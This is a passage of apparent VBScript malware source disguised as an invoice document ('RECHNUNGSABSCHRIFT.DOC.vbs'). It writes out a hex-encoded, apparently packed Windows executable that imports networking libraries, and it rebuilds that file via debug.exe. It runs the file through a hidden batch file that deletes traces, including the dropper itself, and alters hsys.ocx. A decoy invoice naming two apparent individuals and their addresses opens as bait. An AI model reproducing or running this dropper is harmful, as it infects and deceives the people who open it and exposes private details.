f.WriteLine "e2430 33 0d 34 1a 34 23 34 30 34 3e 34 47 34 50 34 5b"
f.WriteLine "e2440 34 65 ff 0b 04 fc 34 6c 34 75 34 7f 0c 96 34 9b"
f.WriteLine "e2450 34 a3 34 aa 34 b8 ff ff ff ff 34 be 34 c4 34 db"
f.WriteLine "e2460 34 e6 34 ec 34 f7 34 04 35 0c 35 21 35 26 35 2b"
f.WriteLine "e2470 35 30 35 3a 35 43 35 56 35 60 04 60 ff ff 35 75"
f.WriteLine "e2480 35 83 35 8c 35 b3 35 d8 35 35 36 52 36 00 00 45"
f.WriteLine "e2490 7d 90 0c 35 20 0d 0a dd 50 14 81 90 a8 03 f8 ad"
f.WriteLine "e24A0 02 07 94 61 c6 ca 52 41 db fe 75 6c 65 48 61 6e"
f.WriteLine "e24B0 64 05 41 11 9e 10 3b a3 20 75 41 21 c7 28 f8 54"
f.WriteLine "e24C0 60 75 70 f4 01 44 0b f1 ce b7 65 2d 74 65 46 69"
f.WriteLine "e24D0 1d 39 61 db 82 7d fb 6c 54 69 6d 65 0d 45 78 69"
f.WriteLine "e24E0 74 39 0c 4c 47 28 e8 b6 76 76 65 4d 11 69 1f 53"
f.WriteLine "e24F0 ca 1a d0 c5 ee 22 6e ae 15 62 db 37 60 46 cf 4c"
f.WriteLine "e2500 69 62 72 67 79 53 35 20 66 ff 44 41 64 64 72 48"
f.WriteLine "e2510 f4 df f6 cd 82 1c 71 6c 5a 36 65 90 72 77 dd b3"
f.WriteLine "e2520 d9 6d 61 42 b7 54 68 06 64 0d 6c 6f 73 ee db b3"
f.WriteLine "e2530 60 d3 c2 79 73 1c 6d 44 69 72 71 c1 fe 96 bd 6f"
f.WriteLine "e2540 47 f9 c9 4e 61 6d cd a1 db 5a 05 39 51 6e 6f 6e"
f.WriteLine "e2550 0c 56 82 c1 1e 6f 70 79 e9 54 65 14 97 ec 93 b9"
f.WriteLine "e2560 62 e0 4f 70 65 6e 0c 3a 86 3d 84 ed 75 72 5e 6e"
f.WriteLine "e2570 00 49 64 4f d7 82 bd 0a 89 61 b2 f9 dd 5d 09 37"
f.WriteLine "e2580 f8 69 7a 19 53 14 6f 66 52 2f 9b b5 b6 3a 6f 47"
f.WriteLine "e2590 40 f6 0d 46 69 cd 82 59 92 6e a9 54 db 69 16 96"
f.WriteLine "e25A0 d3 d6 b5 d8 29 67 b9 e0 b6 05 76 56 5d 75 65 70"
f.WriteLine "e25B0 ed 96 b5 f6 0f 51 0a 23 11 40 55 73 2d 98 e0 92"
f.WriteLine "e25C0 96 1f 3f d3 84 80 bd 61 30 de 0e f6 f6 0e b3 d8"
f.WriteLine "e25D0 40 10 62 2f 76 52 6c 9b cd c2 68 62 5f 63 c8 74"
f.WriteLine "e25E0 d8 79 c1 05 ed 66 70 0b c2 90 00 01 66 98 6d 77"
f.WriteLine "e25F0 3b 66 2b 65 6b 21 5f 73 78 75 b7 2c b8 35 b6 68"
f.WriteLine "e2600 05 72 00 c2 1c db dd d0 4a 67 18 65 72 67 73 0e"
f.WriteLine "e2610 65 78 eb 6f b3 23 7c 70 74 5f 68 c6 72 33 3d 0f"
f.WriteLine "e2620 61 70 70 19 82 db f9 5f 74 79 70 65 09 5f 66 ec"
f.WriteLine "e2630 09 11 ac 9b 0b 7f 6d 0d 02 c4 eb 8a 6e 8b 70 4a"
f.WriteLine "e2640 66 94 21 da ff 3f 61 01 3f 3f 32 40 59 41 50 41"
f.WriteLine "e2650 58 49 40 5a 0d 81 35 74 b7 36 a3 86 6c 6c 06 77"
f.WriteLine "e2660 9a 65 d9 78 9d 8b 16 6e 0f 63 e9 dd 65 1a ae 3d"
f.WriteLine "e2670 98 67 61 63 6d 92 47 7f 7c 8d d6 19 24 56 73 ea"
f.WriteLine "e2680 8b 56 33 84 70 3f d7 58 57 56 61 62 c4 c9 1b 79"
f.WriteLine "e2690 e6 de 07 02 0f 6d 70 6e 08 f6 05 b9 0d 11 68 72"
f.WriteLine "e26A0 2a 5f 68 82 c1 b1 0d 58 0d 74 7c 1b 62 88 49 38"
f.WriteLine "e26B0 cd cd f4 f8 54 cc 38 59 da 98 41 0e 53 72 d0 42"
f.WriteLine "e26C0 63 30 76 77 61 67 1f 46 13 a4 e0 98 b5 85 8c 75"
f.WriteLine "e26D0 2c 30 cd 96 6f 40 bc 49 72 55 70 a5 42 75 66 66"
f.WriteLine "e26E0 d8 b6 1b 61 08 e4 31 ff 09 02 34 59 96 65 59 0a"
f.WriteLine "e26F0 39 04 17 10 40 0a 96 65 73 13 03 40 04 cf 4b 7e"
f.WriteLine "e2700 05 00 7f df c0 0f 01 30 13 82 77 b2 e7 36 3c 04"
f.WriteLine "e2710 f4 64 08 29 78 04 40 a0 c1 06 f6 2d 28 10 07 06"
f.WriteLine "e2720 59 c1 25 05 70 78 0d 72 0a b0 e2 90 16 9c d8 71"
f.WriteLine "e2730 93 53 49 c1 01 40 1c 2e 39 69 26 92 30 10 40 34"
f.WriteLine "e2740 2c cb 72 0a 90 12 50 06 36 34 dd 3b 85 cc 07 fb"
f.WriteLine "e2750 27 08 3c 82 61 23 80 55 72 c1 13 6d 25 4d 77 80"
f.WriteLine "e2760 77 18 44 20 00 a0 7d 6e 0d 38 73 31 94 03 00 00"
f.WriteLine "e2770 00 00 00 00 00 90 ff 00 00 00 00 00 00 00 00 00"
f.WriteLine "e2780 60 be ae 90 40 00 8d be 52 7f ff ff 57 83 cd ff"
f.WriteLine "e2790 eb 10 90 90 90 90 90 90 8a 06 46 88 07 47 01 db"
f.WriteLine "e27A0 75 07 8b 1e 83 ee fc 11 db 72 ed b8 01 00 00 00"
f.WriteLine "e27B0 01 db 75 07 8b 1e 83 ee fc 11 db 11 c0 01 db 73"
f.WriteLine "e27C0 ef 75 09 8b 1e 83 ee fc 11 db 73 e4 31 c9 83 e8"
f.WriteLine "e27D0 03 72 0d c1 e0 08 8a 06 46 83 f0 ff 74 74 89 c5"
f.WriteLine "e27E0 01 db 75 07 8b 1e 83 ee fc 11 db 11 c9 01 db 75"
f.WriteLine "e27F0 07 8b 1e 83 ee fc 11 db 11 c9 75 20 41 01 db 75"
f.WriteLine "e2800 07 8b 1e 83 ee fc 11 db 11 c9 01 db 73 ef 75 09"
f.WriteLine "e2810 8b 1e 83 ee fc 11 db 73 e4 83 c1 02 81 fd 00 f3"
f.WriteLine "e2820 ff ff 83 d1 01 8d 14 2f 83 fd fc 76 0f 8a 02 42"
f.WriteLine "e2830 88 07 47 49 75 f7 e9 63 ff ff ff 90 8b 02 83 c2"
f.WriteLine "e2840 04 89 07 83 c7 04 83 e9 04 77 f1 01 cf e9 4c ff"
f.WriteLine "e2850 ff ff 5e 89 f7 b9 f6 00 00 00 8a 07 47 2c e8 3c"
f.WriteLine "e2860 01 77 f7 80 3f 01 75 f2 8b 07 8a 5f 04 66 c1 e8"
f.WriteLine "e2870 08 c1 c0 10 86 c4 29 f8 80 eb e8 01 f0 89 07 83"
f.WriteLine "e2880 c7 05 89 d8 e2 d9 8d be 00 90 00 00 8b 07 09 c0"
f.WriteLine "e2890 74 45 8b 5f 04 8d 84 30 64 b0 00 00 01 f3 50 83"
f.WriteLine "e28A0 c7 08 ff 96 dc b0 00 00 95 8a 07 47 08 c0 74 dc"
f.WriteLine "e28B0 89 f9 79 07 0f b7 07 47 50 47 b9 57 48 f2 ae 55"
f.WriteLine "e28C0 ff 96 e0 b0 00 00 09 c0 74 07 89 03 83 c3 04 eb"
f.WriteLine "e28D0 d8 ff 96 e4 b0 00 00 61 e9 33 86 ff ff 00 00 00"
f.WriteLine "e28E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e28F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e2900 00 00 00 00 7d df c0 39 00 00 00 00 01 00 00 00"
f.WriteLine "e2910 58 00 00 80 18 00 00 80 00 00 00 00 7d df c0 39"
f.WriteLine "e2920 00 00 00 00 00 00 01 00 6e 00 00 00 30 00 00 80"
f.WriteLine "e2930 00 00 00 00 7d df c0 39 00 00 00 00 00 00 01 00"
f.WriteLine "e2940 19 04 00 00 48 00 00 00 70 80 00 00 20 16 00 00"
f.WriteLine "e2950 00 00 00 00 00 00 00 00 04 00 4b 00 44 00 4c 00"
f.WriteLine "e2960 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e2970 0c c1 00 00 dc c0 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e2980 00 00 00 00 19 c1 00 00 ec c0 00 00 00 00 00 00"
f.WriteLine "e2990 00 00 00 00 00 00 00 00 26 c1 00 00 f4 c0 00 00"
f.WriteLine "e29A0 00 00 00 00 00 00 00 00 00 00 00 00 31 c1 00 00"
f.WriteLine "e29B0 fc c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e29C0 3c c1 00 00 04 c1 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e29D0 00 00 00 00 00 00 00 00 00 00 00 00 48 c1 00 00"
f.WriteLine "e29E0 56 c1 00 00 66 c1 00 00 00 00 00 00 74 c1 00 00"
f.WriteLine "e29F0 00 00 00 00 82 c1 00 00 00 00 00 00 88 c1 00 00"
f.WriteLine "e2A00 00 00 00 00 03 00 00 80 00 00 00 00 4b 45 52 4e"
f.WriteLine "e2A10 45 4c 33 32 2e 44 4c 4c 00 41 44 56 41 50 49 33"
f.WriteLine "e2A20 32 2e 64 6c 6c 00 4d 53 56 43 52 54 2e 64 6c 6c"
f.WriteLine "e2A30 00 55 53 45 52 33 32 2e 64 6c 6c 00 57 53 4f 43"
f.WriteLine "e2A40 4b 33 32 2e 64 6c 6c 00 00 00 4c 6f 61 64 4c 69"
f.WriteLine "e2A50 62 72 61 72 79 41 00 00 47 65 74 50 72 6f 63 41"
f.WriteLine "e2A60 64 64 72 65 73 73 00 00 45 78 69 74 50 72 6f 63"
f.WriteLine "e2A70 65 73 73 00 00 00 52 65 67 43 6c 6f 73 65 4b 65"
f.WriteLine "e2A80 79 00 00 00 61 62 73 00 00 00 53 65 74 54 69 6d"
f.WriteLine "e2A90 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e2AA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e2AB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e2AC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e2AD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e2AE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e2AF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e2B00 51 bc 53 fe bd 53 43 a5 ab 4a b9 ae 54 f8 4a b5"
f.WriteLine "e2B10 42 41 40 bd 48 4b b5 40 47 fe 53 a3 50 b9 52 b3"
f.WriteLine "e2B20 48 fe ab 50 48 b5 45 b3 b0 4a a5 ab 4a b9 4e fe"
f.WriteLine "e2B30 bd 53 43 a5 ab 52 bd ae 54 f8 4a a5 ab 4a a1 53"
f.WriteLine "e2B40 fe bd 53 43 a5 ab 4a b9 ae 4a 45 f8 4a a5 ab 52"
f.WriteLine "e2B50 41 fc 40 bd 48 4b fe bd 53 ab 47 af 4a 44 fe bd"
f.WriteLine "e2B60 4c 4d b5 4c ba 49 40 47 fe bd 4c 4d b5 4c ba b9"
f.WriteLine "e2B70 4e fe 89 8b 62 0b 33 32 f0 b6 43 b5 a5 5f b2 4f"
f.WriteLine "e2B80 43 b9 b2 5f 4d bd b3 b6 b5 4c b5 5a 8b 6f 86 8a"
f.WriteLine "e2B90 77 9d 68 55 42 8d 65 83 6c 8f 6b 6f 86 44 52 87"
f.WriteLine "e2BA0 95 6e 9a 8f 77 4b 5a bb 71 72 68 99 8e 48 94 81"
f.WriteLine "e2BB0 8c 63 95 6f 4e 58 a8 69 50 8f 68 9b 65 fe 89 8b"
f.WriteLine "e2BC0 62 0b 33 2a ac 95 76 65 fe 73 8b 72 9d 9a 10 ae"
f.WriteLine "e2BD0 94 6c 6c f0 86 83 75 6b d0 6f 93 78 fe 6d 91 91"
f.WriteLine "e2BE0 6a 9d 6e 98 6c 99 77 6b a8 9b 6f 6d fc 08 ad 0f"
f.WriteLine "e2BF0 cb 86 14 c7 b8 68 be 6d 91 91 6a 9d 6e 98 6c 99"
f.WriteLine "e2C00 77 6b a8 9b 6f 6d fe ab ba 29 c0 b5 b8 4d 4c be"
f.WriteLine "e2C10 6d 91 91 6a 9d 6e 98 6c 99 77 6b a8 9b 6f 6d f0"
f.WriteLine "e2C20 96 69 21 fe 77 77 67 cc a1 82 77 35 b2 99 6a 1d"
f.WriteLine "e2C30 c3 62 a8 9b 6f 11 af 94 91 62 19 ac 95 76 65 f8"
f.WriteLine "e2C40 e2 b1 9c ea 00 e0 ce 75 00 fc 62 2a 00 fe 65 2a"
f.WriteLine "e2C50 00 fc be 2a 00 fe b5 2a 00 fe 0d 00 00 00 fc 2a"
f.WriteLine "e2C60 00 f8 80 2a 00 fe 99 2a 00 fe e9 2a 00 fe f7 2b"
f.WriteLine "e2C70 00 c0 de 2b 00 f8 d2 2b 00 fe 19 00 00 00 00 00"
f.WriteLine "e2C80 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e2C90 00 fe 1f 00 00 00 00 00 00 00 00 f8 52 f1 eb fd"
f.WriteLine "e2CA0 06 0e"
f.WriteLine "rcx"
f.WriteLine "2ba2"
f.WriteLine "w"
f.WriteLine "q"
f.WriteLine ""
f.Close
set b = fso.GetFile(reg)
b.Copy(dirs&"\dat")
b.Close
Set bf = fso.CreateTextFile("rtx.bat")
bf.WriteLine ""
bf.WriteLine "@echo off"
bf.WriteLine "debug < datax > nul"
bf.WriteLine "rename startx startx.exe"
bf.WriteLine "startx.exe"
bf.WriteLine "debug < datax > nul"
bf.WriteLine "del startx.exe"
bf.WriteLine "del datax"
bf.WriteLine "del startx"
bf.WriteLine "del "&dirs&"\RECHNUNGSABSCHRIFT.DOC.vbs"
bf.WriteLine "copy "&dirs&"\hsys.ocx+"&dirs&"\dat="&dirs&"\hsys.ocx"
bf.WriteLine "del "&dirs&"\dat"
bf.WriteLine "del rtx.bat"
bf.Close
intReturn = WshShell.Run("rtx.bat",0,true)
end sub

sub t()
On Error Resume Next
Set f = fso.CreateTextFile("RECHNUNGSABSCHRIFT.DOC")
f.WriteLine "                                   "
f.WriteLine "                                  INVOICE"
f.WriteLine ""
f.WriteLine ""
f.WriteLine ""
f.WriteLine ""
f.WriteLine "      Date:		September 18, 2000"
f.WriteLine ""
f.WriteLine ""
f.WriteLine "      From:	Katrin Heinze	"
f.WriteLine "		19, chemin des Aulx"
f.WriteLine "                CH-1228"
f.WriteLine "                Plan-les-Ouates,"
f.WriteLine "                Geneva"
f.WriteLine "                Switzerland"
f.WriteLine ""
f.WriteLine ""
f.WriteLine "     To:	Myron Schmidt"
f.WriteLine "		Ch. des Boveresses"
f.WriteLine "                151"
f.WriteLine "                CH-1066 Epalinges"
f.WriteLine "                s/Lausanne"
f.WriteLine "                Switzerland"
f.WriteLine ""
f.WriteLine ""
f.WriteLine ""
f.WriteLine "    Item			Description		                        	Cost"
f.WriteLine ""
f.WriteLine ""
f.WriteLine "    1			August Voice Mail Charges		          CHF  35.00"
f.WriteLine ""
f.WriteLine "    1			Internet - Reserve Domain Name (2 years)      CHF  250.00"
f.WriteLine ""
f.WriteLine "    1			Internet - Set Up Fee			          CHF  110.00"
f.WriteLine ""
f.WriteLine "    1			Internet - Creation Fee			          CHF  250.00"
f.WriteLine ""
f.WriteLine "    1			Internet - Submit to 540 Search Engines	    CHF  50.00"
f.WriteLine ""
f.WriteLine "    1			Internet 6 Months of Hosting		          CHF  200.00"
f.WriteLine ""
f.WriteLine ""
f.WriteLine "    Total                                                       CHF  895.00"
f.WriteLine ""
f.WriteLine ""
f.WriteLine "    Terms - ASAP"
f.WriteLine ""
f.WriteLine ""
f.WriteLine "    Please remit to the above address."
f.WriteLine ""
f.WriteLine ""
f.WriteLine "   Thank You."
f.Close
word=WshShell.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\WORD.DOCUMENT.8\SHELL\OPEN\COMMAND\")
g=InStr(1,word,"%")
s1=Left(word,g-2)
if word="" then
intreturn = WshShell.Run("write.exe RECHNUNGSABSCHRIFT.DOC",1,FALSE)
else 
intreturn = WshShell.Run(s1&" RECHNUNGSABSCHRIFT.DOC",1,FALSE)
end if
end sub





